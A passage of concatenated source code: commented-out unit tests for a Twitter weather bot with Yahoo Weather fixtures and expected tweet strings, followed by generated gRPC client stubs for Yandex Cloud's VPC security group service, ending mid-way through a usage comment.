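In a real revival, the loop body would build the fixture, call `weatherBot.get_weather_variables`, and assert on `weatherBot.make_special_tweet` inside `self.subTest(code=code)` so one failing condition does not mask the rest.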
# def test_make_special_tweet_very_severe_storms(self):
# """Testing if very severe thunderstorm event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '0', 'text': 'Tornado'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1), 'HOLY SHIT, THERE\'S A TORNADO!')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '1', 'text': 'Tropical Storm'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2), 'HOLY SHIT, THERE\'S A TROPICAL STORM!')
# ydata3 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '2', 'text': 'Hurricane'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data3 = weatherBot.get_weather_variables(ydata3)
# self.assertEqual(weatherBot.make_special_tweet(weather_data3), 'HOLY SHIT, THERE\'S A HURRICANE!')
#
# def test_make_special_tweet_wind_condition(self):
# """Testing if wind event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '23', 'text': 'Blustery'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1),
# 'Looks like we\'ve got some wind at 9 mph coming from the NW.')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '24', 'text': 'Windy'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2),
# 'Looks like we\'ve got some wind at 9 km/h coming from the NW.')
#
# def test_make_special_tweet_windchill(self):
# """Testing if windchill event is triggered"""
# ydata_f = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '-22', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-34', 'direction': '15', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata_f)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1),
# 'Wow, mother nature hates us. The windchill is -34' + deg +
# 'F and the wind is blowing at 9 mph from the N. My face hurts.')
# ydata_c = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '-30', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-38', 'direction': '163', 'speed': '42'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata_c)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2),
# 'Wow, mother nature hates us. The windchill is -38' + deg +
# 'C and the wind is blowing at 42 km/h from the S. My face hurts.')
#
# def test_make_forecast(self):
# """Testing if forecast contains the conditions, high, and low temperatures"""
# weather_data = weatherBot.get_weather_variables(ydataNorm)
# now = datetime.now().replace(year=2015, month=4, day=2)
# returned = weatherBot.make_forecast(now, weather_data)
# self.assertTrue('partly cloudy/wind' in returned)
# self.assertTrue('23' + deg + 'F' in returned)
# self.assertTrue('59' + deg + 'F' in returned)
#
# def test_make_forecast_error(self):
# """Testing if error condition tweet is returned"""
# weather_data = weatherBot.get_weather_variables(ydataNorm)
# now = datetime.now().replace(year=2015, month=4, day=10)
# returned = weatherBot.make_forecast(now, weather_data)
# self.assertTrue('not available' in returned)
#
# def test_do_tweet(self):
# """Testing tweeting a test tweet using keys from env variables"""
# tweet_location = False
# variable_location = False
# weather_data = {'region': 'MN', 'code': 33, 'humidity': 70, 'units': {'distance': 'mi', 'pressure': 'in', 'speed': 'mph', 'temperature': 'F'}, 'wind_direction': 'NW', 'city': 'Morris', 'latitude': '45.59', 'temp': 43, 'temp_and_unit': '43ºF', 'condition': 'Fair', 'valid': True, 'deg_unit': 'º F', 'longitude': '-95.9', 'windSpeed': 9.0, 'windSpeed_and_unit': '9 mph', 'apparentTemperature': 37}
# content = 'Just running unit tests, this should disappear... %i' % random.randint(0, 1000)
# tweet_content = content + weatherBot.HASHTAG
# status = weatherBot.do_tweet(content, weather_data, tweet_location, variable_location)
# self.assertEqual(status.text, tweet_content)
# # test destroy
# api = weatherBot.get_tweepy_api()
# deleted = api.destroy_status(id=status.id)
# self.assertEqual(deleted.id, status.id)
#
# def test_do_tweet_with_location(self):
# """Testing tweeting a test tweet with location using keys from env variables"""
# tweet_location = True
# variable_location = False
# weather_data = {'region': 'MN', 'code': 33, 'humidity': 70, 'units': {'distance': 'mi', 'pressure': 'in', 'speed': 'mph', 'temperature': 'F'}, 'wind_direction': 'NW', 'city': 'Morris', 'latitude': '45.59', 'temp': 43, 'temp_and_unit': '43ºF', 'condition': 'Fair', 'valid': True, 'deg_unit': 'º F', 'longitude': '-95.9', 'windSpeed': 9.0, 'windSpeed_and_unit': '9 mph', 'apparentTemperature': 37}
# content = 'Just running unit tests, this should disappear... %i' % random.randint(0, 1000)
# tweet_content = content + weatherBot.HASHTAG
# status = weatherBot.do_tweet(content, weather_data, tweet_location, variable_location)
# self.assertEqual(status.text, tweet_content)
# # test destroy
# api = weatherBot.get_tweepy_api()
# deleted = api.destroy_status(id=status.id)
# self.assertEqual(deleted.id, status.id)
#
# def test_do_tweet_with_variable_location(self):
# """Testing tweeting a test tweet using keys from env variables"""
# tweet_location = True
# variable_location = True
# weather_data = {'region': 'MN', 'code': 33, 'humidity': 70, 'units': {'distance': 'mi', 'pressure': 'in', 'speed': 'mph', 'temperature': 'F'}, 'wind_direction': 'NW', 'city': 'Morris', 'latitude': '45.59', 'temp': 43, 'temp_and_unit': '43ºF', 'condition': 'Fair', 'valid': True, 'deg_unit': 'º F', 'longitude': '-95.9', 'windSpeed': 9.0, 'windSpeed_and_unit': '9 mph', 'apparentTemperature': 37}
# content = 'Just running unit tests, this should disappear... %i' % random.randint(0, 1000)
# tweet_content = weather_data['city'] + ", " + weather_data['region'] + ": " + content + weatherBot.HASHTAG
# status = weatherBot.do_tweet(content, weather_data, tweet_location, variable_location)
# self.assertEqual(status.text, tweet_content)
# # test destroy
# api = weatherBot.get_tweepy_api()
# deleted = api.destroy_status(id=status.id)
# self.assertEqual(deleted.id, status.id)
if __name__ == '__main__':
keys.set_twitter_env_vars()
keys.set_forecastio_env_vars()
unittest.main()
# ==== yandex/cloud/vpc/v1/security_group_service_pb2_grpc.py (repo: korsar182/python-sdk, rev cfb50f6df39b894326521b105f2ddcc9e81727bc, license: MIT) ====
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from yandex.cloud.operation import operation_pb2 as yandex_dot_cloud_dot_operation_dot_operation__pb2
from yandex.cloud.vpc.v1 import security_group_pb2 as yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__pb2
from yandex.cloud.vpc.v1 import security_group_service_pb2 as yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2
class SecurityGroupServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/Get',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.GetSecurityGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__pb2.SecurityGroup.FromString,
)
self.List = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/List',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsResponse.FromString,
)
self.Create = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/Create',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.CreateSecurityGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Update = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/Update',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateRules = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/UpdateRules',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRulesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateRule = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/UpdateRule',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRuleRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Delete = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/Delete',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.DeleteSecurityGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Move = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/Move',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.MoveSecurityGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ListOperations = channel.unary_unary(
'/yandex.cloud.vpc.v1.SecurityGroupService/ListOperations',
request_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsResponse.FromString,
)
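# Illustrative usage sketch for the stub above (comment only; not part of the
# generated gRPC output). The endpoint, TLS setup, and IAM-token metadata key
# are assumptions about a typical Yandex.Cloud deployment:
#
#   channel = grpc.secure_channel('vpc.api.cloud.yandex.net:443',
#                                 grpc.ssl_channel_credentials())
#   stub = SecurityGroupServiceStub(channel)
#   request = yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.GetSecurityGroupRequest(
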